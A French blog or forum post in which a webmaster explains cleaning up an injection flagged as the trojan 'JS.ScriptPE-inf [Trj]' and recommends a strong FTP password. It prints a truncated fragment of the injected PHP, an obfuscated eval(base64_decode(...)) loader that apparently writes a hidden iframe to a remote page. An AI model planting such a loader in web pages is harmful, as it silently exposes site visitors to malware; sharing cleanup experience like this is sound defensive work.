JS.ScriptPE-inf [Trj] - Débarassez-vous en!

Bonjour,

J'ai constaté ce matin en consultant mon site qu'il avait fait l'objet d'une attaque qui se caractérise, pour ceux qui utilisent Avast comme antivirus, par une alerte qui s'affiche et le blocage de l'accès au site en question. L'alerte vous notifie qu'il s'agit d'un trojan nommé "JS.ScriptPE-inf [Trj]".
Mon premier réflexe a été de télécharger mon site en entier, d'effacer la version existante du serveur, de scanner la version sur mon ordinateur avec deux anti-virus différents puis de re-uploader le site web sur le serveur. Cela n'a pas régler le problème. J'ai donc appeler mon hébergeur aux USA qui m'informe qu'il s'agit d'une injection de code dans mon script après quelques minutes au téléphone.
J'ai donc analyser mon code et à ma grande surprise je trouve de grandes portions de code PHP au top de plusieurs pages dont voici une infime partie que j'ai immédiatement enlever :

<?php /**/ eval(base64_decode("[...]3OCU3OCUyRSU2RiU3MiU2NyUyRiU2OSU2RSUyRSU3MCU2OCU3MCUyMiUyMCU3NyU2OSU2NCU3NCU2OCUzRCUzMSUyMCU2OCU2NSU2OSU2NyU2OCU3NCUzRCUzMSUyMCU2NiU3MiU2MSU2RCU2NSU2MiU2RiU3MiU2NCU2NSU3MiUzRCUzMCUzRSUzQyUyRiU2OSU2NiU3MiU2MSU2RCU2NSUzRSUyNyUyOSUzQiIpKTwvc2NyaXB0Pic7ICAgICAgfSAg[...]"));?>

Mon site marche de nouveau, reste à renforcer la sécurité. Je vous retransmet un conseil que mon hébergeur ma donné, CHOISISSEZ UN MOT DE PASSE SÉCURISER POUR VOTRE FTP.

Je n'ai pas eu la chance de trouver une réponse à ce problème en français. J'espère donc que ce post aidera plus d'un.

Bonne chance!